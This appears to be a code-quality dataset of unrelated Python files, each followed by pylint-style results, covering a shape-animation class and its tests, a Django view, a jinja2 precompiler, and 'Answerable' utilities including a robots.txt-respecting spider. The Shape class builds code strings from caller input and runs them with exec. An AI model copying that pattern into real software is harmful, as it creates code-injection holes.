29 self._size = timed_interpolation.TimedInterpolation()
30 self._size.set(0.137, 0.0)
31 self._height = timed_interpolation.TimedInterpolation()
32 self._height.set(0.137, 0.0)
33 self._angle = timed_interpolation.TimedInterpolation()
34 self._angle.set(0.137, 0.0)
35 self._freq = timed_interpolation.TimedInterpolation()
36 self._freq.set(0.137, 0.0)
37 self._amp = timed_interpolation.TimedInterpolation()
38 self._amp.set(0.137, 0.0)
39 self._phase = timed_interpolation.TimedInterpolation()
40 self._phase.set(0.137, 0.0)
41 self._thick = timed_interpolation.TimedInterpolation()
42 self._thick.set(0.137, 0.0)
43 self.fill = 1
44
45
46 def get_primitive(self):
47 if self.type == "/circle" :
48 params = [self._x1.update(), self._y1.update(), self._size.update(), self.fill]
49 elif self.type == "/triangle" :
50 params = [self._x1.update(), self._y1.update(), self._size.update(), self._angle.update(), self.fill]
51 elif self.type == "/square" :
52 params = [self._x1.update(), self._y1.update(), self._size.update(), self._angle.update(), self.fill]
53 elif self.type == "/rect" :
54 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._angle.update(), self.fill]
55 elif self.type == "/line" :
56 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._thick.update()]
57 elif self.type == "/arc" :
58 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._height.update()]
59 elif self.type == "/wave" :
60 params = [self._x1.update(), self._y1.update(), self._x2.update(), self._y2.update(), self._freq.update(), self._amp.update(), self._phase.update(), self._thick.update()]
61 else:
62 print "---- Shape.send() :: Unknown type was set !!"
63
64 return (self.type, params)
65
66
67
68 def get(self, variable):
69 tmp = None
70 #the variable is flg. return the value simply.
71 if variable == "uid" or variable == "active" or variable == "fill" or variable == "name" or variable == "type" :
72 src = "tmp = self." + variable
73 exec(src)
74 return tmp
75 else:
76 src = "tmp = self._" + variable + ".update()"
77 exec(src)
78 return tmp
79
80
81
82
83 def set(self, variable, *args):
84
85 if args:
86 val = args[0]
87 size = len(args)
88
89 if variable == "uid" or variable == "active" or variable == "fill" :
90 src = "self." + variable + "=" + str(val)
91 exec(src)
92 return
93 elif variable == "name" or variable == "type" :
94 # when the variable is array, then use ""
95 src = "self." + variable + "=" + "\"" + str(val) + "\""
96 exec(src)
97 return
98
99
100 if size == 2:
101 # if the second argument was set, set it as duration
102 duration = args[1]
103 else:
104 duration = 0.0
105
106 # set interpolation
107 src = "self._" + variable + ".set(" + str(val) + " , " + str(duration) + ")"
108 exec(src)
109
110
111
112
113
114
115
116
117
118
119
| 62 - error: syntax-error
|
1 from sonilab import event
2 import send_all
3
4
5 def send (adr, params):
6 print adr , " : " ,
7 for elm in params :
8 print elm ,
9 print " /// "
10
11 event.add("/send" , send)
12
13
14 array = []
15 array.append( ("/test1",[1,'a']) )
16 array.append( ("/test2",[2,'b']) )
17 array.append( ("/test3",[3,'c']) )
18 send_all.run(array)
19
20
21
22
23
| 6 - error: syntax-error
|
1 import time
2 import shapes, shape
3
4 circle1 = shape.Shape("/circle" , "circle1")
5 rect1 = shape.Shape("/rect" , "rect1")
6
7 shapes.add(circle1.name, circle1)
8 shapes.add(rect1.name, rect1)
9 shapes.print_all()
10
11 #Check set UID
12 tupple_adr_and_params1 = shapes.get_primitive(circle1.name)
13 tupple_adr_and_params2 = shapes.get_primitive(rect1.name)
14 assert tupple_adr_and_params1[1][0] == 0
15 assert tupple_adr_and_params2[1][0] == 1
16
17
18 #check get_all
19 all_obj = shapes.get_all()
20 for elm in all_obj:
21 obj = elm[1]
22 print elm[0], ":" , obj[0], "," , obj[1], "," , obj[2], "," , obj[3]
23
24
25
26 #How to write and reat each shape
27 shapes.set("circle1" , "x1", 777.0) #You can set plural parameters with set method
28 circle1 = shapes.get("circle1") #You can each shape objects with get method
29 assert circle1.get("x1") == 777.0
30
31
32 #You can set param with time transition
33 shapes.set("circle1" , "x1", 700.0 , 2.0) #You can set plural parameters with set method
34 circle1._x1.print_params()
35
36 while circle1.get("x1") != 700.0:
37 print circle1.get("x1") #print the transition
38 time.sleep(0.1)
39
40
41 #You can see all objects and the parameters with print_all()
42 shapes.print_all()
43
44 print "OK"
| 22 - error: syntax-error
|
1 import shape
2 from sonilab import sl_metro
3
4 metro = sl_metro.Metro(1.0)
5
6
7 shape.Shape.__doc__
8 obj = shape.Shape("/circle" , "foo")
9
10 # obj.type = "SQUARE"
11 obj.active = True
12 obj.set("x1" , 0.1)
13 obj.set("y1" , 0.2)
14 obj.set("y1" , 0.2)
15 obj.set("x2" , 0.3)
16 obj.set("y2" , 4.0)
17
18 obj.set("size" , 0.131)
19 obj.set("height" , 0.132)
20 obj.set("angle" , 0.133)
21 obj.set("freq" , 0.134)
22 obj.set("amp" , 0.135)
23 obj.set("phase" , 0.136)
24 obj.set("thick" , 0.139)
25 obj.fill = False
26
27
28 #check all parameters with get method
29 assert obj.get("type") == "/circle"
30 assert obj.get("name") == "foo"
31 assert obj.get("active") == 1
32 assert obj.get("x1") == 0.1
33 assert obj.get("y1") == 0.2
34 assert obj.get("x2") == 0.3
35 assert obj.get("y2") == 4.0
36
37 assert obj.get("size") == 0.131
38 assert obj.get("height") == 0.132
39 assert obj.get("angle") == 0.133
40 assert obj.get("freq") == 0.134
41 assert obj.get("amp") == 0.135
42 assert obj.get("phase") == 0.136
43 assert obj.get("thick") == 0.139
44 assert obj.get("fill") == 0
45
46
47 #Test parameter managements
48 obj.set("type" , "/circle") #Test set parameter with set method
49 rt = obj.get_primitive()
50 assert rt[0] == "/circle"
51 params = rt[1]
52 assert params[0] == 0.1
53 assert params[1] == 0.2
54 assert params[2] == 0.131
55 assert params[3] == 0
56
57 #Triangle Test
58 obj.set("type" , "/triangle")
59 rt = obj.get_primitive()
60 assert rt[0] == "/triangle"
61 params = rt[1]
62 assert params[0] == 0.1
63 assert params[1] == 0.2
64 assert params[2] == 0.131
65 assert params[3] == 0.133
66 assert params[4] == 0
67
68 #Square Test
69 obj.set("type" , "/square")
70 rt = obj.get_primitive()
71 assert rt[0] == "/square"
72 params = rt[1]
73 assert params[0] == 0.1
74 assert params[1] == 0.2
75 assert params[2] == 0.131
76 assert params[3] == 0.133
77 assert params[4] == 0
78
79 #Rect Test
80 obj.set("type" , "/rect")
81 rt = obj.get_primitive()
82 assert rt[0] == "/rect"
83 params = rt[1]
84 assert params[0] == 0.1
85 assert params[1] == 0.2
86 assert params[2] == 0.3
87 assert params[3] == 4.0
88 assert params[4] == 0.133
89 assert params[5] == 0
90
91 #Line Test
92 obj.set("type" , "/line")
93 rt = obj.get_primitive()
94 assert rt[0] == "/line"
95 params = rt[1]
96 assert params[0] == 0.1
97 assert params[1] == 0.2
98 assert params[2] == 0.3
99 assert params[3] == 4.0
100 assert params[4] == 0.139
101
102 #ARC Test
103 obj.set("type" , "/arc")
104 rt = obj.get_primitive()
105 assert rt[0] == "/arc"
106 params = rt[1]
107 assert params[0] == 0.1
108 assert params[1] == 0.2
109 assert params[2] == 0.3
110 assert params[3] == 4.0
111 assert params[4] == 0.132
112
113 #WAVE Test
114 obj.set("type" , "/wave")
115 rt = obj.get_primitive()
116 assert rt[0] == "/wave"
117 params = rt[1]
118 assert params[0] == 0.1
119 assert params[1] == 0.2
120 assert params[2] == 0.3
121 assert params[3] == 4.0
122 assert params[4] == 0.134
123 assert params[5] == 0.135
124 assert params[6] == 0.136
125 assert params[7] == 0.139
126
127
128 #TEST .set method with int
129 obj.set("uid" , 137)
130 assert obj.uid == 137
131 obj.set("active" , 138)
132 assert obj.active == 138
133 obj.set("fill" , 139)
134 assert obj.fill == 139
135
136 # TEST .set method with string
137 obj.set("type" , "str_test_for_type")
138 assert obj.type == "str_test_for_type"
139 obj.set("name" , "str_test_for_name")
140 assert obj.name == "str_test_for_name"
141
142 #restore the shape type
143 obj.set("type" , "/wave")
144 obj.set("x1" , 0.0)
145 print "Basically, you should use setter and getter methods."
146 print "ex obj.set(\"X1\", 2.0)\n"
147
148 #interpolation demo
149 print "If you set variables with second as second argment then the parameter thanged with interpolation."
150 print "ex. obj.set(\"x1\" , 10.0, 10.0) # <- means make x1 value change to 10.0 with 10.0 seconds"
151 obj.set("x1" , 10.0, 10.0)
152 while True:
153 if metro.update():
154 tmp = obj.get_primitive()
155 params = tmp[1]
156 print params[0]
157 if params[0]==10.0:
158 break
159
160 print "OK"
| 145 - error: syntax-error
|
1 from sonilab import event
2
3 def run(array):
4 for elm in array:
5 adr = elm[0]
6 params = elm[1]
7 event.bang("/send" , adr, params)
8
9
10
| Clean Code: No Issues Detected
|
1 from django.urls import reverse
2 from django.shortcuts import render, redirect
3 from django.forms import modelformset_factory
4 from django.views.generic import *
5 from .models import *
6
7
8 class IndexView(ListView):
9 model = Song
10 template_name = 'song/song_list.html'
11
12 def get_context_data(self, **kwargs):
13 context = super(IndexView, self).get_context_data(**kwargs)
14 context['navbar_title'] = 'AAC로 노래해요'
15 context['navbar_subtitle'] = 'AAC로 노래해요'
16 return context
17
18
19 class DetailView(DetailView):
20 model = Song
21 template_name = 'song/song_detail.html'
22
23 def get_context_data(self, **kwargs):
24 image = Image.objects.select_related('song')
25 context = super(DetailView, self).get_context_data(**kwargs)
26 context['navbar_title'] = 'AAC로 노래해요'
27 context['navbar_subtitle'] = 'AAC로 노래해요'
28 context['images'] = image
29 return context
| 4 - warning: wildcard-import
5 - error: relative-beyond-top-level
5 - warning: wildcard-import
8 - error: undefined-variable
9 - error: undefined-variable
13 - refactor: super-with-arguments
8 - refactor: too-few-public-methods
19 - error: undefined-variable
20 - error: undefined-variable
24 - error: undefined-variable
25 - refactor: super-with-arguments
19 - refactor: too-few-public-methods
1 - warning: unused-import
2 - warning: unused-import
2 - warning: unused-import
3 - warning: unused-import
|
1 # -*- coding: utf-8 -*-
2
3 import jinja2
4 import pytest
5
6 import jinja2precompiler
7
8 def test_IndexError():
9 env = jinja2.Environment(loader=jinja2.FileSystemLoader(["."]))
10 filter_func = jinja2precompiler.make_filter_func("", env, extensions=["html"], all_files=True)
11 assert filter_func("test.html") == True
12 assert filter_func("test.xml") == False
13 assert filter_func("html") == False
| 9 - warning: bad-indentation
10 - warning: bad-indentation
11 - warning: bad-indentation
12 - warning: bad-indentation
13 - warning: bad-indentation
4 - warning: unused-import
|
1 #!/usr/bin/env python
2 # -*- coding: utf-8 -*-
3
4 from optparse import OptionParser
5 import logging
6 import os
7 import re
8 import sys
9
10 import jinja2
11
12 def option_parse():
13 parser = OptionParser()
14 parser.add_option("-a", "--all", action="store_true", dest="all_files", help="all files")
15 parser.add_option("-b", "--base", dest="base", default="", help="base dir name", metavar="DIR")
16 parser.add_option("-c", "--pyc", action="store_true", dest="pyc", help="byte compile")
17 parser.add_option("-d", "--debug", action="store_true", dest="debug", help="debug")
18 parser.add_option("-e", "--ext", dest="extensions", default="html,xhtml", help="list of extension [default: %default]", metavar="EXT[,...]")
19 parser.add_option("-m", "--modulename", action="store_true", dest="modulename", help="return compiled module file name")
20 parser.add_option("-q", "--quit", action="store_true", dest="quit", help="no message")
21 parser.add_option("-v", "--verbose", action="store_true", dest="verbose", help="more messages")
22 (options, args) = parser.parse_args()
23 return parser, options, args
24
25 def get_module_filename(filename, py_compile=False):
26 module_filename = jinja2.ModuleLoader.get_module_filename(filename)
27 if py_compile:
28 module_filename += "c"
29 return module_filename
30
31 def make_filter_func(target, env, extensions=None, all_files=False):
32
33 def filter_func(tpl):
34 if extensions is not None and os.path.splitext(tpl)[1][1:] not in extensions:
35 return False
36 if all_files:
37 return True
38 _content, filename, _update = env.loader.get_source(env, tpl)
39 module_filename = os.path.join(target, get_module_filename(tpl))
40 if not os.path.isfile(module_filename):
41 module_filename_pyc = module_filename + "c"
42 if not os.path.isfile(module_filename_pyc):
43 return True
44 else:
45 module_filename = module_filename_pyc
46 if os.path.getmtime(filename) > os.path.getmtime(module_filename):
47 return True
48 return False
49
50 return filter_func
51
52 if jinja2.__version__[:3] >= "2.8":
53 """
54 jinja2 2.8 supports walking symlink directories.
55 see: https://github.com/mitsuhiko/jinja2/issues/71
56 """
57
58 from jinja2 import FileSystemLoader
59
60 else:
61
62 class FileSystemLoader(jinja2.FileSystemLoader):
63
64 def __init__(self, searchpath, encoding='utf-8', followlinks=False):
65 super(FileSystemLoader, self).__init__(searchpath, encoding)
66 self.followlinks = followlinks
67
68 def list_templates(self):
69 found = set()
70 for searchpath in self.searchpath:
71 walk_dir = os.walk(searchpath, followlinks=self.followlinks)
72 for dirpath, dirnames, filenames in walk_dir:
73 for filename in filenames:
74 template = os.path.join(dirpath, filename) \
75 [len(searchpath):].strip(os.path.sep) \
76 .replace(os.path.sep, '/')
77 if template[:2] == './':
78 template = template[2:]
79 if template not in found:
80 found.add(template)
81 return sorted(found)
82
83 def main():
84
85 def logger(msg):
86 sys.stderr.write("%s\n" % msg)
87
88 parser, options, args = option_parse()
89 if options.debug:
90 logging.getLogger().setLevel(logging.DEBUG)
91 elif options.verbose:
92 logging.getLogger().setLevel(logging.INFO)
93 elif options.quit:
94 logging.getLogger().setLevel(logging.CRITICAL)
95 logger = None
96 logging.debug("parse_options: options %s" % options)
97 logging.debug("parse_options: args %s" % args)
98 for i in args:
99 if not os.path.exists(i):
100 logging.warning("No such directory: '%s'" % i)
101 sys.exit(1)
102 if options.modulename:
103 basedir = re.compile(options.base)
104 results = list()
105 for i in args:
106 results.append(os.path.join(options.base, get_module_filename(basedir.sub("", i).lstrip("/"), py_compile=options.pyc)))
107 print(" ".join(results))
108 sys.exit(0)
109 if len(args) != 1:
110 parser.print_help()
111 sys.exit(1)
112 logging.info("Compiling bundled templates...")
113 arg = args[0]
114 if not arg.endswith(os.path.sep):
115 arg = "".join((arg, os.path.sep))
116 env = jinja2.Environment(loader=FileSystemLoader([os.path.dirname(arg)], followlinks=True))
117 if os.path.isdir(arg):
118 if options.extensions is not None:
119 extensions = options.extensions.split(",")
120 else:
121 extensions = None
122 filter_func = make_filter_func(arg, env, extensions, options.all_files)
123 target = arg
124 logging.info("Now compiling templates in %s." % arg)
125 else:
126 basename = os.path.basename(arg)
127 filter_func = lambda x: x == basename
128 target = os.path.dirname(arg)
129 logging.info("Now compiling a template: %s." % arg)
130 env.compile_templates(target, extensions=None,
131 filter_func=filter_func, zip=None, log_function=logger,
132 ignore_errors=False, py_compile=options.pyc)
133 logging.info("Finished compiling bundled templates...")
134
135 if __name__== "__main__":
136 logging.getLogger().setLevel(logging.WARNING)
137 main()
| 13 - warning: bad-indentation
14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
43 - warning: bad-indentation
44 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
50 - warning: bad-indentation
85 - warning: bad-indentation
86 - warning: bad-indentation
88 - warning: bad-indentation
89 - warning: bad-indentation
90 - warning: bad-indentation
91 - warning: bad-indentation
92 - warning: bad-indentation
93 - warning: bad-indentation
94 - warning: bad-indentation
95 - warning: bad-indentation
96 - warning: bad-indentation
97 - warning: bad-indentation
98 - warning: bad-indentation
99 - warning: bad-indentation
100 - warning: bad-indentation
101 - warning: bad-indentation
102 - warning: bad-indentation
103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
106 - warning: bad-indentation
107 - warning: bad-indentation
108 - warning: bad-indentation
109 - warning: bad-indentation
110 - warning: bad-indentation
111 - warning: bad-indentation
112 - warning: bad-indentation
113 - warning: bad-indentation
114 - warning: bad-indentation
115 - warning: bad-indentation
116 - warning: bad-indentation
117 - warning: bad-indentation
118 - warning: bad-indentation
119 - warning: bad-indentation
120 - warning: bad-indentation
121 - warning: bad-indentation
122 - warning: bad-indentation
123 - warning: bad-indentation
124 - warning: bad-indentation
125 - warning: bad-indentation
126 - warning: bad-indentation
127 - warning: bad-indentation
128 - warning: bad-indentation
129 - warning: bad-indentation
130 - warning: bad-indentation
133 - warning: bad-indentation
136 - warning: bad-indentation
137 - warning: bad-indentation
4 - warning: deprecated-module
42 - refactor: no-else-return
53 - warning: pointless-string-statement
65 - refactor: super-with-arguments
72 - warning: unused-variable
96 - warning: logging-not-lazy
97 - warning: logging-not-lazy
100 - warning: logging-not-lazy
104 - refactor: use-list-literal
124 - warning: logging-not-lazy
129 - warning: logging-not-lazy
130 - error: unexpected-keyword-arg
83 - refactor: too-many-branches
|
1 """Cache Tool for Answerable
2
3 This file contains the functions to access and modify cached content.
4 It may be used by different modules, so each function requires a category argument
5 to avoid collisions.
6
7 As every function is intended to serve a secondary role in extern functions, the
8 logs have an extra level of indentation.
9 """
10
11 import json
12 import pathlib
13 from datetime import datetime as dt
14 from datetime import timedelta as td
15
16 from tools.log import log
17 from tools.displayer import fg, green, magenta
18
19
20 __cache_dir = ".cache"
21
22
23 def check(category: str, _file: str, max_delta: td) -> (bool, pathlib.Path):
24 """Return if a file is cached and where it is located.
25
26 Returns:
27 (B, P) where
28 - B is true if the content is cached and usable
29 - P is the path where the cached content is/should be.
30
31 Parameters:
32 category: Folder inside the cache.
33 _file: File name to look for.
34 max_delta: Timedelta used as threshold to consider a file too old.
35 """
36
37 # Prepare the path to the cached file
38 subpath = pathlib.Path(category) / _file
39 path = pathlib.Path.cwd() / __cache_dir / subpath
40 path.parent.mkdir(parents=True, exist_ok=True)
41
42 try:
43 if not path.exists():
44 log(" Miss {}", fg(subpath, magenta))
45 return False, path
46 else:
47 # Check if the file is too old
48 log(" Hit {}", fg(subpath, green))
49 modified = dt.fromtimestamp(path.stat().st_mtime)
50 now = dt.now()
51 delta = now - modified
52 log(" Time passed since last fetch: {}", delta)
53 valid = delta < max_delta
54 if valid:
55 log(fg(" Recent enough", green))
56 else:
57 log(fg(" Too old", magenta))
58 return valid, path
59 except OSError as err:
60 log(" {}: {}", err, fg(subpath, magenta))
61 return False, path
62
63
64 def update(category: str, _file: str, obj, json_format=True):
65 """Update or create a file in the cache
66
67 Parameters:
68 category: Folder inside the cache.
69 _file: File name to store in.
70 obj: Serializable object to store.
71 """
72
73 subpath = pathlib.Path(category) / _file
74 path = pathlib.Path.cwd() / __cache_dir / subpath
75 path.parent.mkdir(parents=True, exist_ok=True)
76 try:
77 with open(path, "w") as fh:
78 if json_format:
79 json.dump(obj, fh, indent=2)
80 else:
81 fh.write(obj)
82 log(" Cache updated: {}", fg(subpath, green))
83 except OSError as err:
84 log(" {}: {}", err, fg(subpath, magenta))
85 return False, path
86
| 43 - refactor: no-else-return
77 - warning: unspecified-encoding
64 - refactor: inconsistent-return-statements
|
1 """Log Tool for Answerable
2
3 This file contains the functions used to log control data and debug messages
4 in a unified format.
5 """
6
7 import re
8 import sys
9 import inspect
10
11 from tools.displayer import bold, red, magenta, fg
12
13 _logs = [] # list of file handlers
14 _ansire = re.compile("\\033\[[^m]+m") # ansi escape sequences
15
16
17 def _strip_ansi(msg):
18 """Strip ansi escape sequences"""
19
20 return re.sub(_ansire, "", msg)
21
22
23 def _get_caller():
24 frm = inspect.stack()[2]
25 return inspect.getmodule(frm[0]).__name__
26
27
28 def add_stderr():
29 """Add the stderr to the log file handlers"""
30
31 _logs.append(sys.stderr)
32
33
34 def add_log(logfile):
35 """Open a new file and add it to the log file handlers"""
36
37 _logs.append(open(logfile, "w"))
38
39
40 def close_logs():
41 """Close all log file handlers."""
42
43 for f in _logs:
44 if f is not sys.stderr:
45 f.close()
46
47
48 def advice_message():
49 """Returns the advice of where to find the full logs"""
50 lognames = ", ".join([fh.name for fh in _logs if fh is not sys.stderr])
51 return "Full log in " + lognames
52
53
54 def abort(msg, *argv):
55 """Print an error message and aborts execution"""
56
57 if sys.stderr not in _logs:
58 add_stderr()
59 log(fg(msg, red), *argv, who=_get_caller())
60 print_advice()
61 close_logs()
62 exit()
63
64
65 def warn(msg, *argv):
66 """Print an error message and aborts execution"""
67 err_off = sys.stderr not in _logs
68 if err_off:
69 add_stderr()
70 log(fg(msg, magenta), *argv, who=_get_caller())
71 _logs.pop()
72
73
74 def print_advice():
75 """Print where to find the full log if necessary"""
76
77 if sys.stderr not in _logs:
78 print(advice_message(), file=sys.stderr)
79
80
81 def log(msg, *argv, **kargs):
82 """Print to logs a formatted message"""
83
84 who = kargs["who"] if "who" in kargs else _get_caller()
85 who = f"[{who}] "
86 textf = who + _strip_ansi(msg.format(*argv))
87 texts = bold(who) + msg.format(*argv)
88 for f in _logs:
89 if f is sys.stderr:
90 print(texts, file=f)
91 sys.stderr.flush()
92 else:
93 print(textf, file=f)
| 14 - warning: anomalous-backslash-in-string
37 - refactor: consider-using-with
37 - warning: unspecified-encoding
62 - refactor: consider-using-sys-exit
|
1 """Spider Tool for Answerable
2
3 This file contains the functions used to wrapp requests following
4 respecful practices, taking into account robots.txt, conditional
5 gets, caching contente, etc.
6 """
7
8 import json
9 import requests
10
11 # from random import random as rnd
12 from time import sleep
13 from datetime import timedelta as td
14
15 import feedparser
16 from urllib.robotparser import RobotFileParser
17 from urllib.parse import urlparse
18
19 from tools import cache
20 from tools.displayer import fg, bold, green, yellow, red
21 from tools.log import log, abort
22
23 _rp = {} # robots.txt memory
24
25
26 class _FalseResponse:
27 """Object with the required fields to simulate a HTTP response"""
28
29 def __init__(self, code, content):
30 self.status_code = code
31 self.content = content
32
33
34 def ask_robots(url: str, useragent: str) -> bool:
35 """Check if the useragent is allowed to scrap an url
36
37 Parse the robot.txt file, induced from the url, and
38 check if the useragent may fetch a specific url.
39 """
40
41 url_struct = urlparse(url)
42 base = url_struct.netloc
43 if base not in _rp:
44 _rp[base] = RobotFileParser()
45 _rp[base].set_url(url_struct.scheme + "://" + base + "/robots.txt")
46 _rp[base].read()
47 return _rp[base].can_fetch(useragent, url)
48
49
50 def get(url, delay=2, use_cache=True, max_delta=td(hours=12)):
51 """Respectful wrapper around requests.get"""
52
53 useragent = "Answerable v0.1"
54
55 # If a cached answer exists and is acceptable, then return the cached one.
56
57 cache_file = url.replace("/", "-")
58 if use_cache:
59 log("Checking cache before petition {}", fg(url, yellow))
60 hit, path = cache.check("spider", cache_file, max_delta)
61 if hit:
62 with open(path, "r") as fh:
63 res = fh.read().replace("\\r\\n", "")
64 return _FalseResponse(200, res)
65
66 # If the robots.txt doesn't allow the scraping, return forbidden status
67 if not ask_robots(url, useragent):
68 log(fg("robots.txt forbids {}", red), url)
69 return _FalseResponse(403, "robots.txt forbids it")
70
71 # Make the request after the specified delay
72 # log("[{}] {}".format(fg("{:4.2f}".format(delay), yellow), url))
73 log("Waiting to ask for {}", fg(url, yellow))
74 log(" in {:4.2f} seconds", delay)
75 sleep(delay)
76 headers = {"User-Agent": useragent}
77 log("Requesting")
78 res = requests.get(url, timeout=10, headers=headers)
79 # Exit the program if the scraping was penalized
80 if res.status_code == 429: # too many requests
81 abort("Too many requests")
82
83 # Cache the response if allowed by user
84 if use_cache:
85 cache.update(
86 "spider", cache_file, res.content.decode(res.encoding), json_format=False
87 )
88
89 return res
90
91
92 def get_feed(url, force_reload=False):
93 """Get RSS feed and optionally remember to reduce bandwith"""
94
95 useragent = "Answerable RSS v0.1"
96 log("Requesting feed {}", fg(url, yellow))
97 cache_file = url.replace("/", "_")
98
99 # Get the conditions for the GET bandwith reduction
100 etag = None
101 modified = None
102 if not force_reload:
103 hit, path = cache.check("spider.rss", cache_file, td(days=999))
104 if hit:
105 with open(path, "r") as fh:
106 headers = json.load(fh)
107 etag = headers["etag"]
108 modified = headers["modified"]
109 log("with {}: {}", bold("etag"), fg(etag, yellow))
110 log("with {}: {}", bold("modified"), fg(modified, yellow))
111
112 # Get the feed
113 feed = feedparser.parse(url, agent=useragent, etag=etag, modified=modified)
114
115 # Store the etag and/or modified headers
116 if feed.status != 304:
117 etag = feed.etag if "etag" in feed else None
118 modified = feed.modified if "modified" in feed else None
119 new_headers = {
120 "etag": etag,
121 "modified": modified,
122 }
123 cache.update("spider.rss", cache_file, new_headers)
124 log("Stored new {}: {}", bold("etag"), fg(etag, green))
125 log("Stored new {}: {}", bold("modified"), fg(modified, green))
126
127 return feed
| 26 - refactor: too-few-public-methods
62 - warning: unspecified-encoding
105 - warning: unspecified-encoding
|
1 """Displayer Tool for Answerable
2
3 This file contains the functions and variables used to present the data.
4 """
5
6 import tools.statistics as st
7
8 #
9 # COLOR RELATED VARIABLES AND FUNCTIONS
10 #
11 red = (250, 0, 0)
12 green = (0, 250, 0)
13 blue = (0, 0, 250)
14
15 cyan = (0, 250, 250)
16 magenta = (250, 0, 250)
17 yellow = (250, 250, 0)
18
19 """
20 white = (250, 250, 250)
21 gray1 = (200, 200, 200)
22 gray2 = (150, 150, 150)
23 gray3 = (100, 100, 100)
24 gray4 = (50, 50, 50)
25 black = (0, 0, 0)
26 """
27
28
29 def lighten(c, r):
30 dr = (250 - c[0]) * r
31 dg = (250 - c[1]) * r
32 db = (250 - c[2]) * r
33 return (int(c[0] + dr), int(c[1] + dg), int(c[2] + db))
34
35
36 def darken(c, r):
37 dr = c[0] * r
38 dg = c[1] * r
39 db = c[2] * r
40 return (int(c[0] - dr), int(c[1] - dg), int(c[2] - db))
41
42
43 """
44 def interpolate(c, d, r):
45 dr = (d[0] - c[0]) * r
46 dg = (d[1] - c[1]) * r
47 db = (d[2] - c[2]) * r
48 return (int(c[0] + dr), int(c[1] + dg), int(c[2] + db))
49 """
50
51 #
52 # ANSI RELATED VARIABLES AND FUNCTIONS
53 #
54 ansi = True
55
56
57 def bold(msg):
58 if not ansi:
59 return msg
60 return "\033[1m{}\033[0m".format(msg)
61
62
63 def fg(msg, color):
64 if not ansi:
65 return msg
66 return "\033[38;2;{:03};{:03};{:03}m{}\033[0m".format(
67 color[0], color[1], color[2], msg
68 )
69
70
71 def bg(msg, color):
72 if not ansi:
73 return msg
74 return "\033[48;2;{:03};{:03};{:03}m{}\033[0m".format(
75 color[0], color[1], color[2], msg
76 )
77
78
79 def color(msg, fgc, bgc):
80 return bg(fg(msg, fgc), bgc)
81
82
83 #
84 # DATA DISPLAY FUNCTIONS
85 #
86 def disp_feed(feed, info, print_info=False):
87 def title(x):
88 return fg(bold(x), lighten(blue, 0.3))
89
90 def tag(x):
91 return fg(f"[{x}]", darken(cyan, 0.2))
92
93 for i in range(len(feed)):
94 entry = feed[i]
95 print("o", title(entry["title"]))
96 print(" ", " ".join(tag(t) for t in entry["tags"]))
97 print(" ", entry["link"])
98 if print_info and info is not None:
99 print(" ", info[i].replace("\n", "\n "))
100
101
102 def table(data, align=""):
103 cols = len(data[0])
104 widths = []
105 for i in range(0, cols):
106 col = [x[i] for x in data]
107 widths.append(max([len(str(c)) for c in col]))
108
109 row_f = " ".join(["{{:{}{}}}".format(align, w) for w in widths])
110 for d in data:
111 print(row_f.format(*d))
112
113
114 def disp_statistics(user_qa):
115
116 ans_f = fg("{}", lighten(blue, 0.3))
117 tag_f = fg("[{}]", darken(cyan, 0.2))
118 val_f = bold(fg("{}", green))
119
120 def print_section(txt):
121 print(bold(txt.upper()))
122 print()
123
124 def print_metric(txt):
125 def mark(x):
126 return bold(x)
127
128 print(mark(txt))
129
130 def print_answer_and_value(answer, value):
131 tags = answer["tags"]
132 print(val_f.format(value), ans_f.format(answer["title"]))
133 print(" " * len(str(value)), " ".join([tag_f.format(t) for t in tags]))
134
135 user_answers = [a for q, a in user_qa]
136
137 print_section("Answer metrics")
138 metrics = [
139 (bold(k), val_f.format(m(user_answers))) for k, m in st.answer_metrics_single
140 ]
141 table(metrics)
142 print()
143 for (name, metric, key) in st.answer_metrics_tops:
144 print_metric(name)
145 results = metric(user_answers)
146 for a in results:
147 print_answer_and_value(a, key(a))
148 print()
149
150 print_section("Tag metrics")
151 for (name, metric) in st.tag_metrics:
152 print_metric(name)
153 results = metric(user_qa)
154 results = [(tag_f.format(r[0]), val_f.format(r[1])) for r in results]
155 table(results)
156 print()
157
158 print_section("Reputation metrics")
159 metrics = [
160 (bold(k), val_f.format(m(user_answers)))
161 for k, m in st.reputation_metrics_single
162 ]
163 table(metrics)
164 print()
165 for w in st.reputation_weight_metrics[0]:
166 results = st.reputation_weight_metrics[1](user_answers, w)
167 for i, info in enumerate(st.reputation_weight_metrics[2]):
168 print_metric(info.format(w * 100))
169 print(val_f.format(results[i]))
| 43 - warning: pointless-string-statement
63 - warning: redefined-outer-name
71 - warning: redefined-outer-name
107 - refactor: consider-using-generator
114 - refactor: too-many-locals
|
1 """Recommender Tool for Answerable
2
3 This file contains the recommendation algorithm.
4 """
5
6 from bs4 import BeautifulSoup as bs
7 from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
8 from sklearn.metrics.pairwise import linear_kernel
9
10
11 def recommend(user_qa, feed):
12
13 answered = [
14 x[0]["title"] + " " + bs(x[0]["body"], "html.parser").getText(" ", strip=True)
15 for x in user_qa
16 ]
17 tags_ans = [" ".join(x[0]["tags"]) for x in user_qa]
18
19 questions = [x["title"] + x["body"] for x in feed]
20 tags_unans = [" ".join(x["tags"]) for x in feed]
21
22 nans = len(answered)
23 nunans = len(questions)
24
25 """
26 The following code is an adapted version of the Content-Based recommmender
27 described in this tutorial:
28
29 https://www.datacamp.com/community/tutorials/recommender-systems-python
30 """
31
32 tfidf = TfidfVectorizer(stop_words="english")
33 count = CountVectorizer(stop_words="english")
34
35 # list of vectorized body and tags
